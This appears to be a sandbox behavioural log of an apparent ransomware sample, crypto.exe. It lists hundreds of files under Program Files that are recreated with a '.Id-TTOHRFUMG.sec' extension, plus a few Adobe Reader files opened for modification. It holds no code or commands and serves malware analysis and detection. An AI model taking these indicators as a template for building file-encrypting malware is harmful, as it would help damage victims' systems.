File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105396.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01356_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7EN.dub.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\en-US\DVDMaker.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00165_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151055.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCWIZ\ACWZLIB.ACCDE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\RESENDS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\ACT3R.SAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBREF.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\[email protected]	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeUpdater.dll	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\MST7.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285926.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD06200_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\msmgdsrv.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.cpl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21505_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)redStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_el.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216874.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\15x15dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoCanary.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03513_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\JP2KLib.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199423.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00330_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Angles.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00693_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR4B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACEDAO.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\LOCALDV.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePage.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\WORDIRMV.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00224_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296277.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIGN98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libscte27_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\js\main.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105294.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198113.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Urban.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WINWORD.DEV_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDREQS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\tab_off.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.TH.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.FR.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-vertical.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00289_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Oriel.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLY98SP.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01618_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR29F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mscss7es.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PSTPRX32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\security\blacklist.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GR8GALRY.GRA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR40F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\wxpr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\chrome.VisualElementsManifest.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01237_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_few-showers.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mset7tkjp.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01084_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00915_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_Earthy.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152436.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01252_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0228959.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00416_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\DELETE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN058.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libvhs_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01629_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ADD.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\WSS\107.accdt.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10358_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\OUTEX.ECF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_ko.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Dushanbe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Tallinn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01759_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00737_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00159_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\libmux_mp4_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN01308_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0234131.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libps_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157177.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239953.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02169_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21311_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21390_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up_BIDI.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02262_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR3F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.DEV_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Country.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\OWSHLP10.CHM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4ADT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\derby_common.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02371_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR51B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Photo Viewer\PhotoAcq.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\es.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00256_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00114_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14757_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\EMAIL.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Pipeline.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MsMpLics.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\main.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00345_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152432.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\wmpenc.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\instrument.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\msolui100.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BAN98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ja.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01750_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02227_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232393.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01474_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libsepia_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_VelvetRose.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\SUBMIT.JS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\form_edit.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02313_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00783_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\msaccess.exe.manifest.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\libmux_avi_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\DumontDUrville.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152560.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\rt3d.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ApothecaryLetter.dotx.Id-TTOHRFUMG.sec	crypto.exe
